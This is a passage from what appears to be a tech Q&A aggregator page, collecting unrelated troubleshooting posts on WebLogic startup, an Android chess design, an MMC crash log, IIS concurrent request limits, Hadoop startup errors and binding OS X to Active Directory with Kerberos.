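        lxpanel --profile LXDE &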

    Read the article

  • How to start WebLogic Server using default scripts?

    - by Luz Mestre-Oracle
    There are a few common issues reported when starting WebLogic Server using scripts:
      1. User is not able to access the WebLogic console.
      2. After a few days/hours the WebLogic server stops abruptly.
      3. When the user closes PuTTY, they are not able to connect to the WebLogic server anymore.
      4. When the user closes the Windows command prompt, they are not able to connect to the WebLogic server anymore.
      5. WebLogic is started using startManagedWebLogic.cmd/startManagedWebLogic.sh.

    By default, WebLogic Server does not run in background mode, so after you close the window the process finishes as well. On Linux/Unix based platforms, you need to use: nohup ./startManagedWebLogic.sh <Server> <URL> & (a fuller example follows below). On Windows platforms, you need to start Managed Servers using Windows Services: How to Install MS Windows Services For FMW 11g WebLogic Domain Admin and Managed Servers (Doc ID 1060058.1) http://docs.oracle.com/cd/E23943_01/web.1111/e13708/winservice.htm There are a few more reasons that could cause similar symptoms, like a JVM crash, signals sent by the Operating System, and many others, but the above is the first place to start. Enjoy!
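    A slightly fuller form of the nohup invocation (the domain path, server name, and admin URL are examples), redirecting output so the terminal can be closed without blocking on the tty:

        cd /u01/oracle/middleware/user_projects/domains/mydomain/bin
        nohup ./startManagedWebLogic.sh ManagedServer1 t3://adminhost:7001 > /tmp/ManagedServer1.out 2>&1 &
        # tail the redirected output to confirm the server reaches RUNNING state
        tail -f /tmp/ManagedServer1.out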

    Read the article

  • Android chess development design [on hold]

    - by Plejo
    I want to develop a human vs human Android chess game and I have a bunch of new questions. I would like to have a screen where online players are shown (nickname, rating), and when a player challenges another player and he accepts it, the game begins. These are my questions: When a player installs the application, does he have to create an account/login, or does every instance of the installed application have some kind of ID so I can recognize it on the server side? I also want the players' ratings saved in my DB, so a login procedure will probably be necessary. When a player connects to the server, the server updates the online players list. When he challenges another player and the challenge is accepted, the server exchanges IPs (and ports? which port to use?) between the players. Then they connect to each other and the game begins. What is the best practice for the server-to-Android and Android-to-Android connections? Probably sockets, right? Is there any library for handling lost connections etc.? Which server do you recommend?

    Read the article

  • Microsoft Management Console stops working when I add snap-in to it

    - by JayaprakashReddy
    I have Windows 7 Ultimate OS. I'm opening mmc.exe as administrator and trying add Certificates or any other snap-in, then while loading that snap-in MMC breaks and displays following message and after that it closes automatically once I click on close button on that message. What could be the problem? I did following to fix the problem but couldn't succeed any of these: I tried to repair the OS I repaired files using this method Even repaired the installation using this link Update: *@oldskool: Here is the debug process output:* Sorry its a long output text. 'mmc.exe': Loaded 'C:\Windows\System32\mmc.exe', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ntdll.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\kernel32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\KernelBase.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\gdi32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\user32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\lpk.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\usp10.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\msvcrt.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mfc42u.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ole32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\rpcrt4.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\oleaut32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\odbc32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\advapi32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\sechost.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mmcbase.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\shlwapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\uxtheme.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\duser.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\imm32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\msctf.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\odbcint.dll', Binary was not built with debug information. 
'mmc.exe': Loaded 'C:\Windows\System32\dui70.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\shell32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\cryptbase.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\urlmon.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wininet.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\iertutil.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\crypt32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\msasn1.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\clbcatq.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mmcndmgr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dwmapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\oleacc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\cryptsp.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\rsaenh.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\RpcRtRemote.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mlang.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\xmllite.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\version.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\apphelp.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\msi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Program Files\Microsoft Visual Studio 8\SDK\v2.0\Bin\mscormmc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mscoree.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4927_none_d08a205e442db5b5\msvcr80.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\azroleui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\atl.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\secur32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\netutils.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dsrole.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\logoncli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dsuiext.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ntdsapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ws2_32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\nsi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\activeds.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\adsldpc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\Wldap32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mpr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\netapi32.dll', Cannot find or open the PDB file 'mmc.exe': 
Loaded 'C:\Windows\System32\srvcli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wkscli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\certmgr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\certcli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\CertEnroll.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\cryptui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ncrypt.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\bcrypt.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wintrust.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\imagehlp.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\sspicli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\aclui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\IPHLPAPI.DLL', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\winnsi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\slc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\comsnap.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mfc42.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\mycomput.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\devmgr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\setupapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\cfgmgr32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\devobj.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\devrtl.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\newdev.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dmdskmgr.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dmutil.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dmdskres.dll', Binary was not built with debug information. 'mmc.exe': Loaded 'C:\Windows\System32\dmdskres2.dll', Binary was not built with debug information. 
'mmc.exe': Loaded 'C:\Windows\System32\gpedit.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dssec.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\authz.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\dfscli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\samcli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\gpapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\framedynos.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wtsapi32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ipsmsnap.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\winipsec.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\userenv.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\profapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\ipsecsnp.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\polstore.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\localsec.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wdc.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\pdh.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\pdhui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\comdlg32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\credui.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wevtapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\pla.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\tdh.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\winsta.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\utildll.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\browcli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\vdmdbg.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\pmcsnap.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\winspool.drv', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\puiapi.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wsecedit.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\scecli.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\filemgmt.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Program Files\Microsoft SQL Server\100\Tools\Binn\SqlManager.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\mfc80u.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4927_none_d08a205e442db5b5\msvcp80.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.atl_1fc8b3b9a1e18e3b_8.0.50727.4053_none_d1c738ec43578ea1\ATL80.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 
'C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7600.16661_none_ebfb56996c72aefc\comctl32.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\winsxs\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_03ca5532205cb096\mfc80ENU.dll', Binary was not built with debug information. 'mmc.exe': Loaded 'C:\Program Files\Microsoft SQL Server\100\Tools\Binn\Resources\1033\SqlManager.rll', Binary was not built with debug information. 'mmc.exe': Loaded 'C:\Windows\System32\msxml6.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Program Files\Microsoft SQL Server\90\Tools\Binn\SqlManager.dll', Cannot find or open the PDB file 'mmc.exe': Loaded 'C:\Windows\System32\wbem\wbemcntl.dll', Cannot find or open the PDB file The thread 'Win32 Thread' (0xf74) has exited with code 0 (0x0). Unhandled exception at 0x774d35e3 in mmc.exe: 0xC0000374: A heap has been corrupted.

    Read the article

  • Windows 8 / IIS 8 Concurrent Requests Limit

    - by OWScott
    IIS 8 on Windows Server 2012 doesn’t have any fixed concurrent request limit, apart from whatever limit would be reached when resources are maxed. However, the client version of IIS 8, which is on Windows 8, does have a concurrent connection request limitation to limit high traffic production uses on a client edition of Windows. Starting with IIS 7 (Windows Vista), the behavior changed from previous versions. In previous client versions of IIS, excess requests would throw a 403.9 error message (Access Forbidden: Too many users are connected.). Instead, Windows Vista, 7 and 8 queue excessive requests so that they will be handled gracefully, although there is a maximum number of requests that will be processed simultaneously. Thomas Deml provided a concurrent request chart for Windows Vista many years ago, but I have been unable to find an equivalent chart for Windows 8, so I asked Wade Hilmo from the IIS team what the limits are. Since this is controlled not by the IIS team itself but rather by the Windows licensing team, he asked around and found the authoritative answer, which I’ll provide below.

    Windows 8 – IIS 8 concurrent request limits:
      Windows 8                                      3
      Windows 8 Professional                         10
      Windows RT                                     N/A (IIS does not run on Windows RT)

    Windows 7 – IIS 7.5 concurrent request limits:
      Windows 7 Home Starter                         1
      Windows 7 Basic                                1
      Windows 7 Premium                              3
      Windows 7 Ultimate, Professional, Enterprise   10

    Windows Vista – IIS 7 concurrent request limits:
      Windows Vista Home Basic (IIS process activation and HTTP processing only)   3
      Windows Vista Home Premium                     3
      Windows Vista Ultimate, Professional           10

    Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 and Windows Server 2012 allow an unlimited number of simultaneous requests.

    Read the article

  • Problem with hadoop start-dfs.sh

    - by user288501
    I installed and configured hadoop on my Ubuntu 14.04 server, virtualized inside of hyper-v, however I am getting an issue when i run start-dfs.sh root@sUbuntu01:/var/log# start-dfs.sh 14/06/04 15:27:08 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable Starting namenodes on [OpenJDK 64-Bit Server VM warning: You have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard. The VM will try to fix the stack guard now. It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'. localhost] sed: -e expression #1, char 6: unknown option to `s' -c: Unknown cipher type 'cd' localhost: Ubuntu 14.04 LTS localhost: starting namenode, logging to /usr/local/hadoop/logs/hadoop-root-namenode-sUbuntu01.out noexecstack'.: ssh: Could not resolve hostname noexecstack'.: Name or service not known '-z: ssh: Could not resolve hostname '-z: Name or service not known 'execstack: ssh: Could not resolve hostname 'execstack: Name or service not known disabled: ssh: Could not resolve hostname disabled: Name or service not known with: ssh: Could not resolve hostname with: Name or service not known have: ssh: Could not resolve hostname have: Name or service not known VM: ssh: Could not resolve hostname vm: Name or service not known stack: ssh: Could not resolve hostname stack: Name or service not known guard: ssh: Could not resolve hostname guard: Name or service not known fix: ssh: Could not resolve hostname fix: Name or service not known VM: ssh: Could not resolve hostname vm: Name or service not known the: ssh: Could not resolve hostname the: Name or service not known to: ssh: Could not resolve hostname to: Name or service not known warning:: ssh: Could not resolve hostname warning:: Name or service not known it: ssh: Could not resolve hostname it: Name or service not known now.: ssh: Could not resolve hostname now.: Name or service not known library: ssh: Could not resolve hostname library: Name or service not known will: ssh: Could not resolve hostname will: Name or service not known link: ssh: Could not resolve hostname link: Name or service not known or: ssh: Could not resolve hostname or: Name or service not known It's: ssh: Could not resolve hostname it's: Name or service not known <libfile>',: ssh: Could not resolve hostname <libfile>',: Name or service not known which: ssh: connect to host which port 22: Connection timed out have: ssh: connect to host have port 22: Connection timed out you: ssh: connect to host you port 22: Connection timed out try: ssh: connect to host try port 22: Connection timed out the: ssh: connect to host the port 22: Connection timed out highly: ssh: connect to host highly port 22: Connection timed out might: ssh: connect to host might port 22: Connection timed out loaded: ssh: connect to host loaded port 22: Connection timed out You: ssh: connect to host you port 22: Connection timed out guard.: ssh: connect to host guard. 
port 22: Connection timed out library: ssh: connect to host library port 22: Connection timed out Server: ssh: connect to host server port 22: Connection timed out fix: ssh: connect to host fix port 22: Connection timed out The: ssh: connect to host the port 22: Connection timed out recommended: ssh: connect to host recommended port 22: Connection timed out that: ssh: connect to host that port 22: Connection timed out stack: ssh: connect to host stack port 22: Connection timed out OpenJDK: ssh: connect to host openjdk port 22: Connection timed out 64-Bit: ssh: connect to host 64-bit port 22: Connection timed out with: ssh: connect to host with port 22: Connection timed out localhost: Ubuntu 14.04 LTS localhost: starting datanode, logging to /usr/local/hadoop/logs/hadoop-root-datanode-sUbuntu01.out localhost: OpenJDK 64-Bit Server VM warning: You have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard. The VM will try to fix the stack guard now. localhost: It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'. Starting secondary namenodes [OpenJDK 64-Bit Server VM warning: You have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard. The VM will try to fix the stack guard now. It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'. 0.0.0.0] sed: -e expression #1, char 6: unknown option to `s' warning:: ssh: Could not resolve hostname warning:: Name or service not known -c: Unknown cipher type 'cd' It's: ssh: Could not resolve hostname it's: Name or service not known 'execstack: ssh: Could not resolve hostname 'execstack: Name or service not known '-z: ssh: Could not resolve hostname '-z: Name or service not known 0.0.0.0: Ubuntu 14.04 LTS 0.0.0.0: starting secondarynamenode, logging to /usr/local/hadoop/logs/hadoop-root-secondarynamenode-sUbuntu01.out 0.0.0.0: OpenJDK 64-Bit Server VM warning: You have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard. The VM will try to fix the stack guard now. 0.0.0.0: It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'. noexecstack'.: ssh: Could not resolve hostname noexecstack'.: Name or service not known <libfile>',: ssh: Could not resolve hostname <libfile>',: Name or service not known link: ssh: Could not resolve hostname link: No address associated with hostname it: ssh: Could not resolve hostname it: No address associated with hostname to: ssh: connect to host to port 22: Connection timed out or: ssh: connect to host or port 22: Connection timed out you: ssh: connect to host you port 22: Connection timed out guard.: ssh: connect to host guard. port 22: Connection timed out VM: ssh: connect to host vm port 22: Connection timed out stack: ssh: connect to host stack port 22: Connection timed out library: ssh: connect to host library port 22: Connection timed out Server: ssh: connect to host server port 22: Connection timed out might: ssh: connect to host might port 22: Connection timed out stack: ssh: connect to host stack port 22: Connection timed out You: ssh: connect to host you port 22: Connection timed out now.: ssh: connect to host now. 
port 22: Connection timed out disabled: ssh: connect to host disabled port 22: Connection timed out have: ssh: connect to host have port 22: Connection timed out will: ssh: connect to host will port 22: Connection timed out The: ssh: connect to host the port 22: Connection timed out have: ssh: connect to host have port 22: Connection timed out try: ssh: connect to host try port 22: Connection timed out the: ssh: connect to host the port 22: Connection timed out guard: ssh: connect to host guard port 22: Connection timed out the: ssh: connect to host the port 22: Connection timed out recommended: ssh: connect to host recommended port 22: Connection timed out with: ssh: connect to host with port 22: Connection timed out library: ssh: connect to host library port 22: Connection timed out 64-Bit: ssh: connect to host 64-bit port 22: Connection timed out fix: ssh: connect to host fix port 22: Connection timed out which: ssh: connect to host which port 22: Connection timed out VM: ssh: connect to host vm port 22: Connection timed out OpenJDK: ssh: connect to host openjdk port 22: Connection timed out fix: ssh: connect to host fix port 22: Connection timed out highly: ssh: connect to host highly port 22: Connection timed out that: ssh: connect to host that port 22: Connection timed out with: ssh: connect to host with port 22: Connection timed out loaded: ssh: connect to host loaded port 22: Connection timed out 14/06/04 15:36:02 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable Any advice?
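    A hedged note, not taken from the output itself: the flood of "ssh: Could not resolve hostname ..." lines is the JVM stack-guard warning being word-split by the start scripts and handed to ssh as host names, so the underlying problem is the native-library warning rather than SSH. Two commonly suggested remedies (paths assume the /usr/local/hadoop prefix used above):

        # 1) Point Hadoop at its native libraries in hadoop-env.sh
        echo 'export HADOOP_COMMON_LIB_NATIVE_DIR=/usr/local/hadoop/lib/native' >> /usr/local/hadoop/etc/hadoop/hadoop-env.sh
        echo 'export HADOOP_OPTS="-Djava.library.path=/usr/local/hadoop/lib/native"' >> /usr/local/hadoop/etc/hadoop/hadoop-env.sh

        # 2) Or clear the executable-stack flag the warning itself suggests
        #    (install the execstack tool from your distribution if it is missing)
        sudo execstack -c /usr/local/hadoop/lib/native/libhadoop.so.1.0.0

    After either change, run stop-dfs.sh and start-dfs.sh again and check whether the garbled ssh lines are gone.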

    Read the article

  • Can't join OS X Mavericks to AD Domain

    - by watkipet
    I'm attempting to join an OS X Mavericks (10.9) client to a Windows Server 2008 Active Directory domain; however, the bind fails with this error in the OS X client's system.log: Oct 24 15:03:15 host.domain.com com.apple.preferences.users.remoteservice[5547]: -[ODCAddServerSheetController handleOtherActionError: gotError: Error Domain=com.apple.OpenDirectory Code=5202 "Authentication server encountered an error while attempting the requested operation." UserInfo=0x7f9e6cb3e180 {NSLocalizedDescription=Authentication server encountered an error while attempting the requested operation., NSLocalizedFailureReason=Authentication server encountered an error while attempting the requested operation.}, Authentication server encountered an error while attempting the requested operation. I've joined (bound) Ubuntu Linux clients to the same domain with net ads join in the past with no problems (using the same administrative user). I don't have access to any server logs. Here's the GUI error (from Directory Utility) on the OS X client: Here's the GUI error (from Users and Groups) in System Preferences on the OS X client: Update After some Wiresharking I've got some more info: OS X Client -> KDC (over UDP): AS_REQ (no padata) OS X Client <- KDC (over UDP): KRB5KDC_ERR_PREAUTH_REQUIRED OS X Client -> KDC (over UDP): AS_REQ (this time with PA-ENC-TIMESTAMP in padata) OS X Client <- KDC (over UDP): KRB5KDC_ERR_RESPONSE_TOO_BIG OS X Client -> KDC (over TCP): AS_REQ (also with PA-ENC-TIMESTAMP in padata) OS X Client <- KDC (over TCP): KDC_ERR_ETYPE_NOSUPP ...and that's it. This is what I think is going on: The OS X client sends a Kerberos request. The KDC says, "You need to pre-authenticate. Try again." The OS X client tries to pre-authenticate (all this so far is over UDP). Something gets lost on our network and the KDC says, "Oops, something went wrong." The OS X client switches to TCP and tries again. Over TCP, the KDC says, "You're using an encryption type I don't support." Note that in its padata records, the OS X client is always using "aes256-cts-hmac-sha1-96" as its encryption type. However, in its KDC_REQ_BODY record it lists the aes256-cts-hmac-sha1-96, aes128-cts-hmac-sha1-96, des3-cbc-sha1, and rc4-hmac encryption types. When the KDC comes back with KDC_ERR_ETYPE_NOSUPP, it uses rc4-hmac as its encryption type in its padata record. I know next to nothing about Kerberos, but it seems to me that the OS X client should go ahead and try the rc4-hmac encryption type. However, it does nothing after this. Update 2 Here's the debug log from Directory Services on the OS X client. Sorry--it's long.
2013-10-25 14:19:13.219128 PDT - 10544.20463 - ODNodeCustomCall request, NodeID: 52A65FAE-4B24-455D-86EC-2199A780D234, Code: 80 2013-10-25 14:19:13.220409 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - client requested OU - 'CN=Computers,DC=domain,DC=com' 2013-10-25 14:19:13.220427 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - Binding using '[email protected]' for kerberos ID 2013-10-25 14:19:13.220571 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - new kerberos credential cache 'MEMORY:0x7fa713635470' for '[email protected]' 2013-10-25 14:19:13.220623 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: loop 1 2013-10-25 14:19:13.220639 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send 0 patypes 2013-10-25 14:19:13.220653 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - fast disabled, not doing any fast wrapping 2013-10-25 14:19:13.220699 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - Trying to find service kdc for realm DOMAIN.COM flags 0 2013-10-25 14:19:13.221275 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - submissing new requests to new host 2013-10-25 14:19:13.221326 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - connecting to host: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00000001 2013-10-25 14:19:13.221373 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - writing packet: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00000001 2013-10-25 14:19:13.222588 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - reading packet: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00000001 2013-10-25 14:19:13.222617 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - host completed: udp 192.168.0.1:kerberos (192.168.0.1) tid: 00000001 2013-10-25 14:19:13.222665 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_sendto_context DOMAIN.COM done: 0 hosts 1 packets 1 wc: 0.001960 nr: 0.000000 kh: 0.000560 tid: 00000001 2013-10-25 14:19:13.222705 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: loop 2 2013-10-25 14:19:13.222737 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: processing input 2013-10-25 14:19:13.222752 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: got an KRB-ERROR from KDC 2013-10-25 14:19:13.222775 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - krb5_get_init_creds: KRB-ERROR -1765328359/Additional pre-authentication required 2013-10-25 14:19:13.222791 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send 4 patypes 2013-10-25 14:19:13.222800 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send PA-DATA type: 19 2013-10-25 14:19:13.222808 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send PA-DATA type: 2 2013-10-25 14:19:13.222816 PDT - 10544.20463, Node: /Active Directory, Module: ActiveDirectory - krb5_credential - KDC send PA-DATA type: 16 2013-10-25 
